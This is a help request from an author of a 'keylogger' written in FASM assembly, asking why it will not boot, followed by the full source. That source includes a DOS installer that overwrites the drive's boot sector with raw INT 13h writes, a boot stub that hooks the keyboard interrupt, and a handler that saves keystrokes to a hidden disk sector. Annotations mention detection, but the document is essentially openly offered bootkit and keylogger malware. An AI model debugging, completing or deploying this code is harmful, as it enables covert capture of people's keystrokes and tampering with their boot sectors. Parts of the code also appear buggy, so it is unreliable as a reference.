I made a 1337 keylogger in FASM that is meant to be installed into the boot sector of the OS. However, instead of logging keystrokes and writing them to a hard disk sector, my keylogger does not boot with the OS: the problem is that a message is shown saying the boot sector was not found. Please read my source carefully:
; Installer stage (FASM, 16-bit real mode, BIOS services only).
; Origin 100h: presumably assembled as a DOS .COM program - confirm.
; Visible behaviour:
;   1. read sector 1 of BIOS drive 00h into SETOR,
;   2. write that copy to a sector near the end of the geometry
;      reported by INT 13h AH=08h,
;   3. copy 1BDh bytes starting at BOOT into the buffer at offset 1Eh,
;   4. write one sector back to cylinder 0 / head 0 / sector 1.
; Defensive relevance: every step is a raw INT 13h write to drive 00h,
; so the change is visible as a boot-sector mismatch against a
; known-good image, and a write-protected medium rejects the calls.
org 0x100
mov ax,201h ; AH=02h read sectors, AL=1 sector
mov bx,SETOR ; ES:BX = destination buffer
mov cx,1 ; CH=0 cylinder, CL=1 sector
mov dx,0H ; DH=0 head, DL=00h drive
int 13h ; BIOS disk read; the carry/status result is not checked
mov ah,8 ; AH=08h get drive parameters
mov dx,0H ; DL=00h drive
mov di,0
push es ; AH=08h returns a pointer in ES:DI, so ES is saved
mov es,di ; ES:DI = 0000:0000 on entry
INT 13H ; returns max sector in CL, max cylinder in CH, max head in DH
pop es
mov ax,301h ; AH=03h write sectors, AL=1 sector
sub cl,6 ; CL = returned value - 6; CH and DH keep the returned maxima
mov dl,0H ; DL=00h drive (AH=08h returned a drive count in DL)
MOV WORD[SETOR+510],0AA55H ; store signature word at buffer offset 510
mov bx,SETOR ; ES:BX = buffer holding the sector read above
INT 13H ; write the saved copy; result not checked
LEA DI,[SETOR+1Eh] ; destination = buffer offset 1Eh
MOV SI,BOOT ; source = start of the BOOT stub
MOV CX,1BDh ; 1BDh (445) bytes
REP MOVSB ; DS:SI -> ES:DI; direction flag is assumed clear - not set here
lea bx,[SETOR+1Eh] ; BX = address of the copied stub inside the buffer
MOV WORD[SETOR+510],0AA55H ; store signature word at buffer offset 510 again
mov ax,301h ; AH=03h write sectors, AL=1 sector
mov dx,0H ; DH=0 head, DL=00h drive
mov cx,1 ; CH=0 cylinder, CL=1 sector
INT 13H ; write one sector from ES:BX; result not checked
ret ; return to the caller
; 512-byte zero-filled work buffer: one disk sector. It is the target of the
; installer's INT 13h read and the source of its two INT 13h writes.
SETOR DB 512 DUP (0)
; Boot-time stub. The 7C00h-based addresses below indicate it is written to
; run from the address where a legacy BIOS loads a boot sector.
; Visible behaviour:
;   - saves the INT 09h vector (0:24h) into the INT 60h slot (0:180h),
;   - points INT 09h at offset 0 of a segment 3 KB below the size
;     reported by INT 12h,
;   - copies 446 bytes starting at `code` into that segment,
;   - reads the sector at (max sector - 6) into 0:0500h and jumps to it.
; Detection angle: an INT 09h vector whose segment sits just under the top
; of conventional memory, and an INT 60h slot holding the BIOS keyboard
; handler address, are both observable in the interrupt vector table.
; A standalone `es` line appears intended as a segment-override prefix for
; the instruction that follows it.
BOOT:
cli ; no interrupts while the vector table is edited
push es
mov ax,0
mov es,ax ; ES = 0000h, segment of the interrupt vector table
es
mov cx,[24h] ; CX = offset part of the INT 09h vector (9*4 = 24h)
es
mov dx,[26h] ; DX = segment part of the INT 09h vector
es
mov [180h],cx ; INT 60h vector offset (60h*4 = 180h) = old INT 09h offset
es
mov [182h],dx ; INT 60h vector segment = old INT 09h segment
mov cx,0
int 12h ; AX = conventional memory size in KB
sub ax,3 ; 3 KB below the reported size
mov cl,6
shl ax,cl ; KB * 64 = segment value
mov cx,0
mov bp,ax ; BP = target segment, kept for the rest of the stub
es
mov [24h],cx ; new INT 09h offset = 0
es
mov [26h],bp ; new INT 09h segment = BP
pop es
sti
push es
mov si,bp
mov es,si ; ES = target segment
mov si,7C00h + code ; start of the program
mov di,0
mov cx,446 ; size of my payload (bytes copied)
repz
movsb ; copy DS:SI -> ES:0000; DS is not set by this stub
pop es
push es
mov ax,bp
mov es,ax
mov ax,0
mov bx,7C00h + 480 ; offset of the word the handler uses as its buffer index
mov es,bp
es
mov [bx],ax ; zero that index word in the target segment
pop es
MOV AH,8 ; AH=08h get drive parameters
MOV DL,0 ; DL=00h drive
MOV DI,0
PUSH ES
MOV ES,DI ; ES:DI = 0000:0000 on entry
INT 13h ; returns max sector in CL, max cylinder in CH, max head in DH
POP ES
MOV AX,201h ; AH=02h read sectors, AL=1 sector
MOV BX,0
MOV ES,BX
MOV BX,500h ; ES:BX = 0000:0500h destination
MOV DL,0 ; DL=00h drive
SUB CL,6 ; same sector arithmetic as the installer's first write
INT 13h ; read one sector; result not checked
JMP 0:500h ; far jump to the sector just read
; Keyboard interrupt handler: the 446 bytes the boot stub copies to the
; segment it installs as the INT 09h vector.
; Visible behaviour: reads the scan code from port 60h, calls INT 60h (where
; the boot stub stored the previous INT 09h vector), stores make codes in a
; buffer addressed as 7C00h+482 with its index word at 7C00h+480, then
; issues an INT 13h AH=03h write to drive 00h and sends EOI to the PIC.
; Detection angle: a BIOS disk write issued on every keyboard interrupt is
; unusual activity for an INT 09h handler.
; A standalone `ds` line appears intended as a segment-override prefix for
; the instruction that follows it.
code:
pushf
pushaw ; save all 16-bit general registers
sti
IN AL,60H ; AL = scan code from the keyboard controller data port
push ax ; keep the scan code across the chained call
int 60h ; run the handler whose vector the boot stub saved at 0:180h
pop ax
push cs
pop bx ; BX = CS
push ds
mov ds,bx ; DS = CS, the handler's own segment
push es
test al,80h ; bit 7 set = key release (break code)
jnz L1 ; releases are not stored
ds
mov bx,[7C00h+480] ; BX = current buffer index
ds
lea si,[7C00h+482] ; SI = buffer base
ds
mov [si+bx],al ; store the scan code
inc bx
ds
mov [7C00h+480],bx ; save the advanced index
L1:
cmp bx,512 ; compare BX with 512, the sector size
jz zera
jmp pula
zera:
mov ax,0
mov [7C00h+480],ax ; reset the index word to 0
pula:
push es
mov cx,ds ; author's note: "translates the 512 bytes of scan codes to ASCII"; no translation step is visible here
mov es,cx ; ES = DS
mov cx,1
push bx
dec bx
ds
lea si,[7C00h+482+bx] ; SI = address of buffer entry BX-1
pop bx ; BX restored to its value before the dec
int 12h ; AX = conventional memory size in KB
sub ax,4
mov cl,6
shl ax,cl ; (KB - 4) * 64 = segment value
mov bp,ax ; BP is not referenced again in this listing
MOV AH,8 ; AH=08h get drive parameters
MOV DL,0 ; DL=00h drive
PUSH ES
MOV DI,0
MOV ES,DI ; ES:DI = 0000:0000 on entry
INT 13h ; returns max sector in CL, max cylinder in CH, max head in DH
POP ES
MOV AX,301h ; AH=03h write sectors, AL=1 sector
push bx
lea bx,[bx] ; BX unchanged; ES:BX is the buffer passed to the write
SUB CL,7 ; CL = returned value - 7; CH and DH keep the returned maxima
MOV DL,0 ; DL=00h drive
INT 13h ; write one sector; result not checked
pop bx
POP ES
skip:
mov al,20h
out 20h,al ; end-of-interrupt command to the interrupt controller at port 20h
pop es
pop ds
popaw
popf
iret
; Label marking the end of the handler, followed by two data bytes.
; 55h then AAh is the same value the installer stores as the word 0AA55h at
; buffer offset 510.
codesize:
db 55h
db AAh